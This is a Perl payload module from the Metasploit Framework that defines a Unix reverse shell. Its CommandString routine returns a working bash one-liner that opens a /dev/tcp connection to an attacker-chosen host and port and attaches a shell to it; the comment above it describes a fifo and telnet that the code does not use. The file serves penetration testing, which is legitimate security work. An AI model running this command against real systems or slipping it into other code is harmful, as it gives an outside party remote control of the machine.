##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Payload::cmd_unix_reverse_bash;
use strict;
use base 'Msf::PayloadComponent::CommandPayload';
sub _Load {
Msf::PayloadComponent::CommandPayload->_Import('Msf::PayloadComponent::ReverseConnection');
__PACKAGE__->SUPER::_Load();
}
my $info =
{
'Name' => 'Unix /dev/tcp Piping Reverse Shell',
'Version' => '$Revision: 1889 $',
'Description' => 'Use bash and /dev/tcp to simulate reverse shell',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Priv' => 0,
'OS' => [ 'solaris', 'linux', 'bsd' ],
'Keys' => ['+cmd_bash'],
};
sub new {
_Load();
my $class = shift;
my $hash = @_ ? shift : { };
$hash = $class->MergeHashRec($hash, {'Info' => $info});
my $self = $class->SUPER::new($hash, @_);
return($self);
}
# We create a fifo and force the first telnet process to read from it,
# this prevents it from exiting if there is no stdin in the remote
# environment. By piping the output of the second command into the
# fifo, we can cause the whole sequence to exit cleanly
sub CommandString {
my $self = shift;
my $host = $self->GetVar('LHOST');
my $port = $self->GetVar('LPORT');
my $command =
"exec 13<>/dev/tcp/$host/$port;sh <&13 >&13";
return($command);
}
1;